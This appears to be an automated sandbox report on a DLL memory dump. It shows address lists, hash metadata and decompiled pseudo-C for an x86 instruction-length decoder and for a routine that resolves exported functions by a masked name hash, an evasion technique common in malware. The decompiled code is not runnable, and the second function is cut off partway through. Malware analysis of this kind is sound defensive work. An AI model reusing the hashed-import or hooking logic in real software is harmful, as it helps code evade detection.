0x6e2d8644
0x6e2d8653
0x6e2d8655
0x6e2d8657
0x6e2d8675
0x6e2d8677
0x6e2d8679
0x6e2d868b
0x6e2d86a9
0x6e2d86b2
0x6e2d86b5
0x6e2d86c3
0x6e2d86d4
0x6e2d86f2
0x6e2d86f4
0x6e2d86f8
0x6e2d86f8
0x6e2d86f8
0x6e2d8679
0x00000000
0x6e2d8657
0x6e2d860f
0x6e2d860f
0x6e2d8614
0x6e2d861b
0x6e2d862a
0x6e2d8631
0x6e2d8633
0x00000000
0x00000000
0x6e2d863f
0x6e2d8640
0x6e2d8642
0x00000000
0x00000000
0x00000000
0x6e2d8642
0x6e2d8635
0x6e2d8638
0x00000000
0x00000000
0x6e2d86fa
0x6e2d86fa
0x6e2d86fb
0x6e2d86fb
0x00000000
0x6e2d84db
0x6e2d84db
0x6e2d84db
0x6e2d84dd
0x6e2d84e4
0x6e2d84f2
0x6e2d84f4
0x6e2d84f8
0x6e2d84fa
0x6e2d8526
0x6e2d852a
0x6e2d852f
0x6e2d8534
0x6e2d8538
0x6e2d853c
0x6e2d8543
0x6e2d8548
0x6e2d854a
0x6e2d8ad9
0x6e2d8ae8
0x6e2d8b07
0x6e2d8b0c
0x6e2d8b0c
0x6e2d855d
0x6e2d8562
0x6e2d8566
0x6e2d8566
0x6e2d8566
0x6e2d8577
0x6e2d8579
0x6e2d857b
0x6e2d858c
0x6e2d858c
0x6e2d8591
0x6e2d8596
0x6e2d859a
0x6e2d859f
0x6e2d85a6
0x6e2d85ab
0x6e2d85ad
0x6e2d8a9b
0x6e2d8aa7
0x6e2d8ac1
0x6e2d8ac6
0x6e2d8ac6
0x6e2d85c3
0x6e2d85c8
0x6e2d85cc
0x6e2d85cc
0x6e2d85cc
0x6e2d85cc
0x6e2d85cf
0x6e2d85cf
0x00000000
0x6e2d85cf
0x6e2d84fe
0x6e2d84fe
0x6e2d8500
0x6e2d850c
0x6e2d8513
0x6e2d8515
0x00000000
0x00000000
0x6e2d8521
0x6e2d8522
0x6e2d8524
0x00000000
0x00000000
0x00000000
0x6e2d8524
0x6e2d8517
0x6e2d851a
0x00000000
0x00000000
0x6e2d85d0
0x6e2d85d4
0x6e2d85d5
0x6e2d85d5
0x00000000
0x6e2d84dd
0x6e2d84d5

Strings

, xrefs: 6E2D8A5E

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ed20a271df3380407315c2fa232c18c10c5b7ef6633770021337d75abb034d7e
Instruction ID: 5eac33046fcbdbd021a5609f03f9f6909a837bc1079f31428e6a4a9eeb15caff
Opcode Fuzzy Hash: ed20a271df3380407315c2fa232c18c10c5b7ef6633770021337d75abb034d7e
Instruction Fuzzy Hash: 331274751082099FD725DFA4C990AAF77EAEF84718F254D2CE795872A0EF309C09CB46

Uniqueness

Uniqueness Score: -1.00%

Function 6E2E9348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E2E9348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E2E3670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e2e934f
0x6e2e9353
0x6e2e935f
0x6e2e9363
0x6e2e9367
0x6e2e936c
0x6e2e936f
0x6e2e9371
0x6e2e9373
0x6e2e9373
0x6e2e9376
0x6e2e937c
0x6e2e93f4
0x6e2e93f8
0x6e2e93fb
0x6e2e93fb
0x6e2e93fe
0x00000000
0x6e2e93fe
0x6e2e9383
0x6e2e93eb
0x6e2e93ef
0x00000000
0x6e2e93ef
0x6e2e938a
0x6e2e93e3
0x6e2e93e6
0x00000000
0x6e2e93e6
0x6e2e938f
0x6e2e93cd
0x6e2e93d4
0x6e2e93d7
0x6e2e93a0
0x6e2e93a0
0x6e2e93a6
0x00000000
0x00000000
0x6e2e93ab
0x6e2e93c5
0x6e2e93c8
0x00000000
0x6e2e93c8
0x6e2e93b0
0x00000000
0x6e2e93b2
0x6e2e93b6
0x6e2e93b9
0x00000000
0x6e2e93b9
0x6e2e93b0
0x6e2e9401
0x6e2e9401
0x6e2e9401
0x6e2e940a
0x6e2e9413
0x6e2e9416
0x6e2e9419
0x6e2e941c
0x6e2e941f
0x6e2e9425
0x6e2e9467
0x6e2e946a
0x6e2e946b
0x6e2e9472
0x6e2e9475
0x6e2e9427
0x6e2e942b
0x6e2e9435
0x6e2e943c
0x6e2e943e
0x6e2e9457
0x6e2e945a
0x6e2e945a
0x6e2e943c
0x6e2e947d
0x6e2e9480
0x6e2e9483
0x6e2e9487
0x6e2e948b
0x6e2e9495
0x6e2e9499
0x6e2e94a3
0x6e2e94ac
0x6e2e94b9
0x6e2e94bc
0x6e2e94bf
0x6e2e94bf
0x6e2e94cb
0x6e2e94d6
0x6e2e94dc
0x6e2e94e0
0x6e2e94cd
0x6e2e94cd
0x6e2e94cd
0x6e2e94e8
0x6e2e9512
0x6e2e9518
0x6e2e9518
0x6e2e9520
0x6e2e98c9
0x6e2e98cf
0x6e2e98d5
0x6e2e98d5
0x00000000
0x6e2e9526
0x6e2e9526
0x6e2e952a
0x6e2e952d
0x6e2e9530
0x6e2e9533
0x6e2e9537
0x6e2e9539
0x6e2e953c
0x6e2e953f
0x6e2e9543
0x6e2e9548
0x6e2e954b
0x6e2e954f
0x6e2e9554
0x6e2e9557
0x6e2e9559
0x6e2e955c
0x6e2e9560
0x6e2e9565
0x6e2e9575
0x6e2e957b
0x6e2e957b
0x6e2e9583
0x6e2e9585
0x6e2e958e
0x6e2e9590
0x6e2e9593
0x6e2e959e
0x6e2e95cb
0x6e2e95a0
0x6e2e95b7
0x6e2e95b7
0x6e2e95d3
0x6e2e95d9
0x6e2e95df
0x6e2e95df
0x6e2e95d3
0x6e2e958e
0x6e2e95e6
0x6e2e9657
0x6e2e965c
0x6e2e96b5
0x6e2e9777
0x6e2e977c
0x6e2e978b
0x6e2e9791
0x6e2e9795
0x6e2e979e
0x6e2e97a5
0x6e2e97ae
0x6e2e97bc
0x6e2e97bf
0x6e2e97a7
0x6e2e97a7
0x6e2e97a7
0x6e2e97a5
0x6e2e97c8
0x6e2e97f5
0x6e2e9808
0x6e2e9810
0x6e2e97f7
0x6e2e97f9
0x6e2e9801
0x6e2e9801
0x6e2e97ca
0x6e2e97cf
0x6e2e97ee
0x6e2e97d1
0x6e2e97d6
0x6e2e97e7
0x6e2e97d8
0x6e2e97d8
0x6e2e97d8
0x6e2e97d6
0x6e2e97cf
0x6e2e9818
0x6e2e9827
0x6e2e9834
0x6e2e983d
0x6e2e9841
0x6e2e9845
0x6e2e9848
0x6e2e984b
0x6e2e984e
0x6e2e9851
0x6e2e9854
0x6e2e985a
0x6e2e985e
0x6e2e9864
0x6e2e9864
0x6e2e985a
0x6e2e986a
0x6e2e98a7
0x6e2e98ab
0x6e2e98b2
0x6e2e98b8
0x6e2e986c
0x6e2e986f
0x6e2e988f
0x6e2e9893
0x6e2e989a
0x6e2e98a1
0x6e2e9871
0x6e2e9874
0x6e2e9876
0x6e2e987a
0x6e2e9884
0x6e2e988a
0x6e2e988a
0x6e2e9874
0x6e2e986f
0x6e2e98bf
0x6e2e98bf
0x6e2e98d8
0x6e2e98d8
0x6e2e98de
0x6e2e98e3
0x6e2e993d
0x6e2e9942
0x6e2e9981
0x6e2e9986
0x6e2e9988
0x6e2e998c
0x6e2e998f
0x6e2e9992
0x6e2e9994
0x6e2e9995
0x6e2e9995
0x6e2e999a
0x6e2e99b8
0x6e2e99ba
0x6e2e99be
0x6e2e99c4
0x6e2e99c7
0x6e2e99c9
0x6e2e99ca
0x6e2e99ca
0x00000000
0x6e2e999c
0x6e2e999c
0x6e2e999c
0x6e2e99a0
0x6e2e99a6
0x6e2e99a9
0x6e2e99ab
0x6e2e99ae
0x6e2e99cd
0x6e2e99cd
0x6e2e99d4
0x6e2e99ee
0x6e2e99d6
0x6e2e99d6
0x6e2e99e2
0x6e2e99e3
0x6e2e99e6
0x6e2e99e6
0x6e2e99fc
0x6e2e99fc
0x6e2e999a
0x6e2e9947
0x6e2e9955
0x6e2e996d
0x6e2e9971
0x6e2e9974
0x6e2e997a
0x6e2e997e
0x6e2e997e
0x00000000
0x6e2e997e
0x6e2e9957
0x6e2e995b
0x6e2e9961
0x6e2e9961
0x6e2e9967
0x00000000
0x6e2e9967
0x6e2e9949
0x6e2e994d
0x00000000
0x6e2e994d
0x6e2e98e7
0x6e2e9913
0x6e2e992b
0x6e2e992f
0x6e2e9932
0x6e2e9935
0x6e2e9937
0x6e2e993a
0x6e2e9915
0x6e2e9915
0x6e2e9919
0x6e2e991c
0x6e2e991f
0x6e2e9922
0x6e2e9925
0x6e2e9925
0x00000000
0x6e2e9913
0x6e2e98ed
0x00000000
0x00000000
0x6e2e98f3
0x6e2e98f7
0x6e2e98fd
0x6e2e9900
0x6e2e9903
0x6e2e9906
0x00000000
0x6e2e9906
0x6e2e977e
0x6e2e9782
0x6e2e9788
0x00000000
0x6e2e9788
0x6e2e96c0
0x6e2e96d2
0x6e2e96d7
0x6e2e9742
0x00000000
0x00000000
0x6e2e9749
0x6e2e976f
0x6e2e9773
0x00000000
0x00000000
0x6e2e9752
0x6e2e9757
0x6e2e976b
0x00000000
0x00000000
0x00000000
0x6e2e976d
0x6e2e975e
0x00000000
0x00000000
0x6e2e9763
0x00000000
0x00000000
0x6e2e9765
0x00000000
0x6e2e9749
0x6e2e96d9
0x6e2e96e3
0x6e2e96f4
0x6e2e96f7
0x6e2e96fa
0x6e2e9700
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2e9706
0x6e2e9706
0x6e2e9706
0x6e2e970d
0x00000000
0x00000000
0x6e2e970f
0x6e2e9712
0x6e2e9718
0x00000000
0x00000000
0x00000000
0x6e2e971a
0x6e2e971c
0x6e2e9725
0x00000000
0x00000000
0x6e2e9739
0x00000000
0x00000000
0x00000000
0x6e2e973b
0x6e2e96c7
0x00000000
0x00000000
0x00000000
0x6e2e96cd
0x6e2e9661
0x6e2e9690
0x6e2e9691
0x6e2e969a
0x00000000
0x6e2e96ab
0x00000000
0x6e2e96ab
0x6e2e9668
0x6e2e966b
0x6e2e967e
0x6e2e967f
0x6e2e9683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2e966b
0x6e2e9661
0x6e2e95ed
0x6e2e964a
0x6e2e964e
0x6e2e9654
0x00000000
0x6e2e9654
0x6e2e95ef
0x6e2e95f3
0x6e2e9600
0x6e2e9604
0x6e2e961a
0x6e2e9622
0x6e2e9606
0x6e2e9608
0x6e2e9612
0x6e2e9612
0x6e2e9628
0x6e2e9631
0x6e2e9648
0x00000000
0x00000000
0x00000000
0x6e2e9648
0x6e2e9633
0x6e2e9633
0x00000000
0x6e2e9628

Strings

, xrefs: 6E2E99B3

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: 9fae526c4456659368dd8546593cba7a8a3e8df1cf8069a00b5acff3d9c2cf46
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: 7A22C77040C3AE8FD714CF55C4A136ABBE2BF86301F4088AFE8E547695D3359969CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E2E1460, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E2E1460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E2E0328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e2ed208 == 0 ||  *0x6e2ed2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E2E4FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e2ed2ec |  *0x6e2ed2ed;
									if(( *0x6e2ed2ec |  *0x6e2ed2ed) == 0) {
										_t525 =  *0x6e2ed208; // 0x0
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e2ed2ec = 1;
											_t526 = E6E2E35F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E2E1C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e2ed208 = _t526;
											 *0x6e2ed2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
